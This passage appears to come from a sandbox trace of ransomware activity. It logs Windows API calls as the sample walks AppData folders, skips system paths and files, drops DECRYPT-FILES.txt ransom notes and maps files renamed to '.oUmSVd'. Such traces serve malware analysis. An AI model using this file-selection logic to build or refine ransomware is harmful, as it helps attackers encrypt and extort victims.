ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 1 [0182.447] lstrcmpW (lpString1="Themes", lpString2=".") returned 1 [0182.447] lstrcmpW (lpString1="Themes", lpString2="..") returned 1 [0182.447] lstrcatW (in: lpString1="Themes", lpString2="\\" | out: lpString1="Themes\\") returned="Themes\\" [0182.447] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Themes\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" [0182.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\Program Files") returned 0x0 [0182.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch=":\\Windows") returned 0x0 [0182.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\Games\\") returned 0x0 [0182.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\All Users") returned 0x0 [0182.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.447] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="AhnLab") returned 0x0 [0182.448] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.448] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 71 [0182.448] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.448] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\\0a16c9.tmp") returned 82 [0182.448] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x274 [0182.448] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 71 [0182.448] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.448] wsprintfW (in: param_1=0x36fe2f8, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\\DECRYPT-FILES.txt") returned 89 [0182.448] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.448] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 71 [0182.448] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*" [0182.448] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*", lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefc42dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc42dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479978 [0182.449] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.449] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xefc42dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc42dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.449] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.449] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.449] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xefc42dc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefc42dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc42dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.449] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.449] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.449] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.449] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.449] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.449] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.449] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.449] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.449] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.449] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.449] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.449] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.449] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.449] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.449] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.449] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 71 [0182.449] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.449] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" [0182.449] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\0a16c9.tmp" [0182.449] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.450] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.450] CloseHandle (hObject=0x0) returned 0 [0182.450] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.450] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac265d40, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac265d40, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac28bea0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0182.450] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0182.450] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xac2b2000, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x9d0b3, dwReserved0=0x0, dwReserved1=0x0, cFileName="TranscodedWallpaper.jpg.oUmSVd", cAlternateFileName="TRANSC~1.OUM")) returned 1 [0182.450] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.oUmSVd", lpString2="DECRYPT-FILES.txt") returned 1 [0182.450] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.oUmSVd", lpString2="autorun.inf") returned 1 [0182.450] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.oUmSVd", lpString2="boot.ini") returned 1 [0182.450] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.oUmSVd", lpString2="desktop.ini") returned 1 [0182.450] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.oUmSVd", lpString2="ntuser.dat") returned 1 [0182.450] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.oUmSVd", lpString2="iconcache.db") returned 1 [0182.450] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.oUmSVd", lpString2="bootsect.bak") returned 1 [0182.450] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.oUmSVd", lpString2="ntuser.dat.log") returned 1 [0182.450] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.oUmSVd", lpString2="thumbs.db") returned 1 [0182.450] lstrcmpiW (lpString1="TranscodedWallpaper.jpg.oUmSVd", lpString2="Bootfont.bin") returned 1 [0182.450] lstrlenW (lpString="TranscodedWallpaper.jpg.oUmSVd") returned 30 [0182.450] lstrcmpiW (lpString1="oUmSVd", lpString2="lnk") returned 1 [0182.450] lstrcmpiW (lpString1="oUmSVd", lpString2="exe") returned 1 [0182.450] lstrcmpiW (lpString1="oUmSVd", lpString2="sys") returned -1 [0182.450] lstrcmpiW (lpString1="oUmSVd", lpString2="dll") returned 1 [0182.450] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 71 [0182.450] lstrlenW (lpString="TranscodedWallpaper.jpg.oUmSVd") returned 30 [0182.451] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" [0182.451] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\", lpString2="TranscodedWallpaper.jpg.oUmSVd" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.oUmSVd") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.oUmSVd" [0182.451] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.451] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg.oUmSVd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\themes\\transcodedwallpaper.jpg.oumsvd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0182.451] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=643251) returned 1 [0182.451] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0182.451] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2b30000 [0182.463] UnmapViewOfFile (lpBaseAddress=0x2b30000) returned 1 [0182.463] CloseHandle (hObject=0x280) returned 1 [0182.463] CloseHandle (hObject=0x27c) returned 1 [0182.463] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.464] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xac2b2000, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x9d0b3, dwReserved0=0x0, dwReserved1=0x0, cFileName="TranscodedWallpaper.jpg.oUmSVd", cAlternateFileName="TRANSC~1.OUM")) returned 0 [0182.464] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0182.464] CloseHandle (hObject=0x274) returned 1 [0182.464] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xac2fe2c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac2fe2c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes\\", cAlternateFileName="")) returned 0 [0182.464] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0182.464] CloseHandle (hObject=0x26c) returned 1 [0182.464] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f71aa70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xac324420, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac324420, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0182.464] lstrcmpW (lpString1="Word", lpString2=".") returned 1 [0182.464] lstrcmpW (lpString1="Word", lpString2="..") returned 1 [0182.464] lstrcatW (in: lpString1="Word", lpString2="\\" | out: lpString1="Word\\") returned="Word\\" [0182.464] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Word\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\" [0182.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\Program Files") returned 0x0 [0182.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch=":\\Windows") returned 0x0 [0182.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\Games\\") returned 0x0 [0182.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\Tor Browser\\") returned 0x0 [0182.464] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\ProgramData\\") returned 0x0 [0182.465] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0182.465] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0182.465] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0182.465] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\All Users") returned 0x0 [0182.465] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\IETldCache\\") returned 0x0 [0182.465] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\Local Settings\\") returned 0x0 [0182.465] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="\\AppData\\Local") returned 0x0 [0182.465] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="AhnLab") returned 0x0 [0182.465] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0182.465] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\") returned 61 [0182.465] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.465] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\\\0a16c9.tmp") returned 72 [0182.465] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0182.473] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\") returned 61 [0182.473] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0182.473] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\\\DECRYPT-FILES.txt") returned 79 [0182.473] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\word\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0182.474] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\") returned 61 [0182.474] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\*" [0182.474] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f71aa70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xefc8f080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc8f080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0182.474] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0182.474] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f71aa70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xefc8f080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc8f080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.474] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0182.474] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0182.474] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xefc8f080, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xefc8f080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xefc8f080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0182.474] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0182.474] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0182.474] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0182.474] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0182.474] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0182.474] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0182.474] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0182.474] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0182.474] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0182.474] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0182.474] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.474] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0182.474] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0182.474] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0182.474] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0182.474] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\") returned 61 [0182.474] lstrlenW (lpString="0a16c9.tmp") returned 10 [0182.475] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\" [0182.475] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\0a16c9.tmp" [0182.475] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.475] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js 